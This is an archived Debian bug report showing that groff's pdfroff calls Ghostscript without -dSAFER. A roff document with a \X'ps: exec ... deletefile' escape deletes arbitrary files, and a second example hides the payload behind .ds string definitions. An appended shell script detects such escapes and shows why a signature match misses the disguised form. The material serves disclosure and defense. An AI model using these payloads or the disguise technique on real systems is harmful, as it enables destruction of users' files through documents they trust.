[Secure-testing-team] Bug#538338: groff: pdfroff invokes gs insecurely (without -dSAFER)
brian m. carlson
sandals at crustytoothpaste.ath.cx
Fri Jul 24 22:17:15 UTC 2009
Package: groff
Version: 1.20.1-4
Severity: grave
File: /usr/bin/pdfroff
Tags: security
pdfroff invokes gs without -dSAFER, leading to the ability to write,
rename, and delete arbitrary files:

lakeview ok % cat attack.roff
I am an evil attacking document. Boo!
\X'ps: exec (/tmp/remove-me) deletefile'
lakeview ok % touch /tmp/remove-me && pdfroff attack.roff >/dev/null && [ ! -f "/tmp/remove-me" ] && echo removed
GPL Ghostscript SVN PRE-RELEASE 8.64: Unrecoverable error, exit code 1
removed

Using ps2pdf may be a better solution, since it uses -dSAFER
automatically.

Obviously, this is a fairly straightforward example, but in a document
the size of groff's -me manual, this could easily be hidden. Disguising
it is easy, such as in:

lakeview ok % cat attack.roff
I am an evil attacking document. Boo!
.ds df deletefile
.ds fn /tmp/remove-me
\X'ps: exec (\*(fn) \*(df'

Processing or viewing a document from an unknown source shouldn't by
default cause code from that document to be executed, in general.
-- System Information:
Debian Release: squeeze/sid
APT prefers unstable
APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/zsh4
Versions of packages groff depends on:
ii groff-base 1.20.1-4 GNU troff text-formatting system (
ii libc6 2.9-21 GNU C Library: Shared libraries
ii libgcc1 1:4.4.1-1 GCC support library
ii libice6 2:1.0.5-1 X11 Inter-Client Exchange library
ii libsm6 2:1.1.0-2 X11 Session Management library
ii libstdc++6 4.4.1-1 The GNU Standard C++ Library v3
ii libx11-6 2:1.2.2-1 X11 client-side library
ii libxaw7 2:1.0.5-2 X11 Athena Widget library
ii libxmu6 2:1.0.4-1 X11 miscellaneous utility library
ii libxt6 1:1.0.5-3 X11 toolkit intrinsics library
Versions of packages groff recommends:
ii ghostscript 8.64~dfsg-13 The GPL Ghostscript PostScript/PDF
ii imagemagick 7:6.5.1.0-1.1 image manipulation programs
ii libpaper1 1.1.23+nmu1 library for handling paper charact
ii netpbm 2:10.0-12 Graphics conversion tools
ii psutils 1.17-26 A collection of PostScript documen
groff suggests no packages.
-- no debconf information
--
brian m. carlson / brian with sandals: Houston, Texas, US
+1 713 440 7475 | http://crustytoothpaste.ath.cx/~bmc | My opinion only
OpenPGP: RSA v4 4096b 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187
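A pre-flight check for roff input, added here as an example and not part of the report or of groff: it refuses any document carrying a \X'ps: device-control escape, and contrasts that with a payload-signature match which the .ds disguise from the report slips past. The function and file names are my own; the sample documents are constructed from the two shown above.

```shell
#!/bin/sh
# Added example (not from the bug report): scan roff input before it
# reaches pdfroff -> gs. The robust check keys on the PostScript
# passthrough mechanism itself (\X'ps: ...'), not on payload words,
# because the report shows the payload can be assembled from .ds strings.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
CLEAN_DOC="$WORK/clean.roff"
PLAIN_DOC="$WORK/plain-attack.roff"
HIDDEN_DOC="$WORK/hidden-attack.roff"

# Constructed sample inputs: one ordinary -me paragraph, plus the two
# attack documents exactly as the report prints them.
printf '%s\n' '.pp' 'Just an ordinary -me document.' > "$CLEAN_DOC"
printf '%s\n' 'I am an evil attacking document. Boo!' \
    "\\X'ps: exec (/tmp/remove-me) deletefile'" > "$PLAIN_DOC"
printf '%s\n' 'I am an evil attacking document. Boo!' \
    '.ds df deletefile' '.ds fn /tmp/remove-me' \
    "\\X'ps: exec (\\*(fn) \\*(df'" > "$HIDDEN_DOC"

# Signature-style check: looks for the deletefile payload spelled out
# inside the escape. The .ds indirection in the report defeats it.
roff_matches_payload_signature() {
    grep -qE "\\\\X'ps:.*deletefile" "$1"
}

# Mechanism check: any \X'ps: escape at all. -F takes the backslash and
# the quote literally.
roff_has_ps_escape() {
    grep -qF "\\X'ps:" "$1"
}

# scan_roff FILE: print a verdict; exit 0 for clean, 1 for refused.
scan_roff() {
    if roff_has_ps_escape "$1"; then
        printf 'REFUSE %s: PostScript device-control escape at\n' "$1"
        grep -nF "\\X'ps:" "$1" | sed 's/^/    line /'
        return 1
    fi
    printf 'OK     %s\n' "$1"
}

for f in "$CLEAN_DOC" "$PLAIN_DOC" "$HIDDEN_DOC"; do
    scan_roff "$f" || true
done
```

The disguised document is refused by scan_roff but is missed by roff_matches_payload_signature, which is the point of the report's second example.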